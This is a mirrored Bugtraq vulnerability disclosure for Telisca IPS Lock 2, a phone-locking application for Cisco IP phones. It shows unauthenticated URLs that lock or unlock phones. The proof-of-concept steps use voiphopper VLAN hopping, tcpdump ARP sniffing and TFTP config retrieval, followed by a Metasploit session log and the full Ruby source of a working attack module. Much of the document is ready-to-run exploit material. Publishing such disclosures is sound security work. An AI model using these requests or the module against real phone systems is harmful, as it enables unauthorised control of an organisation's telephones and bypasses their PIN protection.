Telisca IPS Lock 2 Vulnerability

From: karim reda Fakhir <karim.fakhir@gmail.com>
To: bugtraq@securityfocus.com
Cc:
Subject: Telisca IPS Lock 2 Vulnerability
Date:


a vulnerability  in IPS LOCK , below is the description :


# Exploit Title: TELISCA IPS LOCK ABUSE
# Date: 13/01/2016
# Software Link: http://www.telisca.com/products/ip-phone-apps/ipslock/
# Exploit Author: Fakhir Karim Reda
# Contact: karim.fakhir@gmail.com
# Metasploit module :
https://www.rapid7.com/db/modules/auxiliary/voip/telisca_ips_lock_control
# Publicly disclosed via Metaploit PR 'URL',
'https://github.com/rapid7/metasploit-framework/pull/6470'
# Category: VOIP

1. Description

Telisca IPS Lock 2(IPS Lock is an XML application for Cisco IP Phones
which permits locking the phones and preventing any unauthorized
calls.
http://www.telisca.com/ips-lock-2/) suffers from vulnerability that allows any
attacker to lock/unlock IP-Phones without knowing the pin code. The attacker
have just to do http request to IPS Lock Server with Mac ADDR of the phone:

For example to lock the IP Phone SEP27745DA145D2    :

http://IPSLOCKSRV:80/IPSPCFG/user/Default.aspx?action=DO&tg=L&pn=SEP27745DA145D2&dp=&gr=&gl=

For example to unlock the IP Phone SEP27745DA145D2   :

http://IPSLOCKSRV/IPSPCFG/user/Default.aspx?action=U7LCK&pn=SEP88908D68C5D4&dp=

Source of problem :

The page default.aspx did not check if the pin code is present or correct.


2. Proof of Concept



The attacker sniff for cdp protocol, and then he identified the vlan voice , for
example VLAN 3 :

With tool like voiphopper he can get an ip on this vlan :

#voiphopper  -i eth0 -v 3

#ifconfig
eth0.3    Link encap:Ethernet  HWaddr b8:ca:3a:9c:fa:41
          inet addr:10.16.43.190  Bcast:10.16.43.255  Mask:255.255.252.0
          inet6 addr: fe80::baca:3aff:fe9c:fa41/64
Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500
Metric:1
          RX packets:309658 errors:0 dropped:9
overruns:0 frame:0
          TX packets:23988 errors:0 dropped:0
overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:15123464 (14.4 MiB)  TX bytes:1906037 (1.8 MiB)

We can now
sniff for ARP requests, in order to get the MAC ADDR of phones :

# tcpdump -vvv -e -s 1500 -i eth0.3 "icmp or arp"

tcpdump:
listening on eth0.3, link-type EN10MB (Ethernet), capture size 1500 bytes

16:31:08.531106
00:50:56:be:5e:a7 (oui Unknown) > Broadcast, ethertype ARP (0x0806), length
60: Ethernet (len 6), IPv4 (len 4), Request who-has 10.16.43.184 tell
10.16.40.12, length 46

16:31:08.817916
88:90:8d:73:e7:43 (oui Unknown) > Broadcast, ethertype ARP (0x0806), length
60: Ethernet (len 6), IPv4 (len 4), Request who-has 172.16.40.100 tell
172.16.42.120, length 46

With network scanner he identified the TFTP Server for example 10.16.43.1 :
We can download the ip phones configs

#tftp 10.16.43.1
get SEPSEP27745DA145D2.cnf.xml

 The content of the file contain the IPS LOCK IP server :

</phoneService>
<phoneService  type="0" category="0">
<name>IPS
Phone Config / IPS Lock</name>
<url>http://IPSLOCKSRV:80/IPSPCFG/user/Default.aspx?pn=#DEVICENAME#</url>
<vendor></vendor>
<version></version>
</phoneService>
</phoneServices>
</device>

Accessi to the URL
http://IPSLOCKSRV:80/IPSPCFG/user/Default.aspx?pn=#DEVICENAME# he
can now get the URLS for locking and unlocking services:

http://IPSLOCKSRV:80/IPSPCFG/user/Default.aspx?action=DO&tg=L&pn=SEP27745DA145D2&dp=&gr=&gl=

For example
to unlock the IP Phone SEP27745DA145D2   :

http://IPSLOCKSRV/IPSPCFG/user/Default.aspx?action=U7LCK&pn=SEP88908D68C5D4&dp=

Finally we can use this metasploit module  :
https://raw.githubusercontent.com/kfr-ma/metasploit-framework/test_telisca_ipslock/modules/auxiliary/voip/telisca_ips_lock_control.rb
to lock and unlock phones :




[*]
Processing telisco.rb for ERB directives.
resource (telisco.rb)> use auxiliary/scanner/voice/telisca_ips_lock_abuse
resource (telisco.rb)> set PHONENAME SEP27745DA145D2
PHONENAME=> SEPC80084ED0DBD
resource (telisco.rb)> set RHOST 10.16.40.18
RHOST =>10.16.40.18
resource (telisco.rb)> set VHOST 10.16.40.18
VHOST => 10.16.40.18
resource (telisco.rb)> set ACTION UNLOCK
ACTION => UNLOCK
resource(telisco.rb)> run
[+] Try to unlock
[+] Deivice SEP27745DA145D2 successfully unlocked
[*] Auxiliary module execution completed

msf auxiliary(telisca_ips_lock_abuse) >

Below the source code of the exploit :


##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Telisca IPS Lock Cisco IP Phone Control',
      'Description'    => %q{
        This module allows an unauthenticated attacker to exercise the
        "Lock" and "Unlock" functionality of Telisca IPS Lock for Cisco IP
        Phones. This module should be run in the VoIP VLAN, and requires
        knowledge of the target phone's name (for example, SEP002497AB1D4B).

        Set ACTION to either LOCK or UNLOCK. UNLOCK is the default.
      },
      'References'     =>
        [
          # Publicly disclosed via Metaploit PR
          'URL', 'https://github.com/rapid7/metasploit-framework/pull/6470'
        ],
      'Author'         =>
        [
          'Fakhir Karim Reda <karim.fakhir[at]gmail.com>'
        ],
      'License'        => MSF_LICENSE,
      'DisclosureDate' => 'Dec 17 2015',
      'Actions'        =>
       [
         ['LOCK', 'Description' => 'To lock a phone'],
         ['UNLOCK', 'Description' => 'To unlock a phone']
       ],
       'DefaultAction' => 'UNLOCK'
    ))

    register_options(
      [
        OptAddress.new('RHOST', [true, 'The IPS Lock IP Address']),
        OptString.new('PHONENAME', [true, 'The name of the target phone'])
      ], self.class)

  end

  def print_status(msg='')
    super("#{peer} - #{msg}")
  end

  def print_good(msg='')
    super("#{peer} - #{msg}")
  end

  def print_error(msg='')
    super("#{peer} - #{msg}")
  end

  # Returns the status of the listening port.
  #
  # @return [Boolean] TrueClass if port open, otherwise FalseClass.
  def port_open?
    begin
      res = send_request_raw({'method' => 'GET', 'uri' => '/'})
      return true if res
    rescue ::Rex::ConnectionRefused
      vprint_status("Connection refused")
    rescue ::Rex::ConnectionError
      vprint_error("Connection failed")
    rescue ::OpenSSL::SSL::SSLError
      vprint_error("SSL/TLS connection error")
    end

    false
  end

  # Locks a device.
  #
  # @param phone_name [String] Name of the phone used for the pn parameter.
  #
  # @return [void]
  def lock(phone_name)
    res = send_request_cgi({
      'method'    => 'GET',
      'uri'       => '/IPSPCFG/user/Default.aspx',
      'headers'   => {
        'Connection' => 'keep-alive',
        'Accept-Language' => 'en-US,en;q=0.5'
      },
      'vars_get'  => {
        'action'  => 'DO',
        'tg' => 'L',
        'pn' => phone_name,
        'dp' => '',
        'gr' => '',
        'gl' => ''
      }
    })

    if res && res.code == 200
      if res.body.include?('Unlock') || res.body.include?('U7LCK')
        print_good("The device #{phone_name} is already locked")
      elsif res.body.include?('unlocked') ||
res.body.include?('Locking') || res.body.include?('QUIT')
        print_good("Device #{phone_name} successfully locked")
      end
    elsif res
      print_error("Unexpected response #{res.code}")
    else
      print_error('The connection timed out while trying to lock.')
    end
  end


  # Unlocks a phone.
  #
  # @param phone_name [String] Name of the phone used for the pn parameter.
  #
  # @return [void]
  def unlock(phone_name)
    res = send_request_cgi({
      'method'    => 'GET',
      'uri'       => '/IPSPCFG/user/Default.aspx',
      'headers'   => {
        'Connection' => 'keep-alive',
        'Accept-Language' => 'en-US,en;q=0.5'
      },
      'vars_get' => {
        'action' => 'U7LCK',
        'pn'     => phone_name,
        'dp'     => ''
      }
    })

    if res && res.code == 200
      if res.body.include?('Unlock') || res.body.include?('U7LCK')
        print_good("The device #{phone_name} is already locked")
      elsif res.body.include?('unlocked') || res.body.include?('QUIT')
        print_good("The device #{phone_name} successfully unlocked")
      end
    elsif res
      print_error("Unexpected response #{res.code}")
    else
      print_error('The connection timed out while trying to unlock')
    end
  end


  def run
    unless port_open?
      print_error('The web server is unreachable!')
      return
    end

    phone_name = datastore['PHONENAME']
    case action.name
      when 'LOCK'
        lock(phone_name)
      when 'UNLOCK'
        unlock(phone_name)
    end
  end
end


Regards.





Copyright © 1995-2018 LinuxRocket.net. All rights reserved.